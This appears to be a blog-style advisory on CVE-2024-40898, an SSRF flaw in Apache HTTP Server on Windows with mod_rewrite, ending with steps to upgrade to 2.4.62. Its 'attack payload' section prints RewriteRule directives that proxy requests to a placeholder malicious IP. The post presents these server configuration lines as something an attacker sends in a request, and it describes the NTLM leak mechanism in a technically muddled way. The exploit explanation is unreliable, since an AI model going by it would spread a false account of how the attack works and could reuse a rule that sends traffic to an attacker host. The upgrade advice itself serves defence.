CVE-2024-40898: SSRF Vulnerability Discovered in Apache HTTP Server on Windows with mod_rewrite – How to Stay Protected

In this post, we will delve into the details of a recent security vulnerability, the CVE-2024-40898, found in the Apache HTTP Server (on Windows) software. This vulnerability is related to Server Side Request Forgery (SSRF) in conjunction with mod_rewrite module usage in server/vhost context. Attackers exploiting this vulnerability could potentially leak NTLM hashes to a malicious server via SSRF and malicious requests, compromising system security. The good news is that a fix for this issue has been released with the Apache HTTP Server version 2.4.62. We will also provide information on how to upgrade your system to this version and protect it from this vulnerability.

The Vulnerability Explained

The SSRF vulnerability is closely linked to the mod_rewrite module of the Apache HTTP Server on Windows. The mod_rewrite module is commonly used to perform URL rewriting and can be configured in different contexts, including server and virtual host (vhost) contexts. An attacker can exploit the mod_rewrite module and create malicious URLs that force the Apache server to send requests to unauthorized destinations, potentially leaking sensitive information like NTLM hashes to the malicious server.

Let's take a closer look at how this process works. Suppose a vulnerable Apache server is running on a Windows-based system and is configured with mod_rewrite in server/vhost context. An attacker can craft a malicious request containing a URL with a special syntax:

http://<target_ip>/<attack_payload>;

This attack payload could look like this

RewriteEngine On
RewriteCond %{HTTP_HOST} =target_server
RewriteRule ^/?(.*) http://<malicious_ip>/ [P,L]

This payload causes the server to rewrite the URL, sending an HTTP request to the malicious server with the target server's NTLM hash. This allows the attacker to gain access to sensitive information that can be used to compromise the target system further.

Here's the link to the original advisory detailing this vulnerability: APACHE-2024-40898.

How to Protect Your System

The Apache HTTP Server development team has released a fix for this vulnerability with version 2.4.62. To protect your system, follow these steps:

Backup your Apache HTTP server configuration files and any custom settings you may have applied.

2. Download the updated Apache HTTP Server software and install it on your system. Use the following links to download the latest version:

Official Apache Download site: httpd.apache.org/download.cgi

Direct Link for Windows (32-bit): httpd-2.4.62-win32.zip

Direct Link for Windows (64-bit); httpd-2.4.62-win64.zip

3. Follow the installation instructions provided in the official Apache documentation.

4. Review and apply your custom configuration and settings to the updated Apache HTTP server by referring to your backup files.

Restart the Apache HTTP server for the changes to take effect.

In conclusion, the CVE-2024-40898 vulnerability in Apache HTTP servers on Windows using mod_rewrite can be quite severe if exploited, allowing unauthorized access to sensitive NTLM hashes. Thankfully, fixing this vulnerability is a relatively straightforward process, as users can simply upgrade to the latest version of the software. By following the steps outlined in this post and keeping their systems up-to-date, users can significantly reduce the risk of falling prey to such exploits.

Timeline

Published on: 07/18/2024 10:15:03 UTC
Last modified on: 08/08/2024 16:02:40 UTC